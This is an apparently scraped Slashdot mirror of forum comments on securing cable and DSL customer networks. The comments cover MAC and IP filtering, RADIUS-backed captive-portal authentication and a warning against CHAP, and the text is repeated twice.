There are more security issues that are a tad more difficult to solve. Primary one being security of routing protocols. And IPSec is not a solution for that. Still some research to be done in this area.
Besides, unless one solves the scalability and ease-of-management issues with end-to-end IPSec, wide-adoption will not happen.
What kind of authentication you can implement depends on what information about the user you have.
It seems you have MAC addresses of your customers. So you can filter via MAC. Since DHCP can associate MAC and IP address, you can also filter IPs. Is there a way the users can update their MAC addresses if it changes? In that case you would have some kind of username/password based accounts. Probably stored in a RADIUS database.
If the above is true, then you might want to visit http://www.stockholmopen.net (I hope I got the site right). It is meant for wireless networks, but actually is agnostic of what kind of network is in use. Good for shared media networks, such as cable. Authenticates users using username and password (over a secure HTTPS link), and does access control through IP and MAC. You can throw out bits you don't want.
The premise is that the DHCP server will dole out addresses to the clients, but the router will not forward any packets until the user is authenticated. Runs on Linux, but can be configured for other Unices with ipfilter/ipfw like firewall control.
--
Parijat
I assume one would have to use PPPoE or PPTP to deploy PPP over a DSL/Cable network.
In this case, one should be careful not to use CHAP as the authentication mechanism. It is not suitable for IP networks and there are known (and easy) attacks against it.
Slashdot Mirror
There are more security issues that are a tad more difficult to solve. Primary one being security of routing protocols. And IPSec is not a solution for that. Still some research to be done in this area.
Besides, unless one solves the scalability and ease-of-management issues with end-to-end IPSec, wide-adoption will not happen.
What kind of authentication you can implement depends on what information about the user you have. It seems you have MAC addresses of your customers. So you can filter via MAC. Since DHCP can associate MAC and IP address, you can also filter IPs. Is there a way the users can update their MAC addresses if it changes? In that case you would have some kind of username/password based accounts. Probably stored in a RADIUS database. If the above is true, then you might want to visit http://www.stockholmopen.net (I hope I got the site right). It is meant for wireless networks, but actually is agnostic of what kind of network is in use. Good for shared media networks, such as cable. Authenticates users using username and password (over a secure HTTPS link), and does access control through IP and MAC. You can throw out bits you don't want. The premise is that the DHCP server will dole out addresses to the clients, but the router will not forward any packets until the user is authenticated. Runs on Linux, but can be configured for other Unices with ipfilter/ipfw like firewall control. -- Parijat
I assume one would have to use PPPoE or PPTP to deploy PPP over a DSL/Cable network. In this case, one should be careful not to use CHAP as the authentication mechanism. It is not suitable for IP networks and there are known (and easy) attacks against it.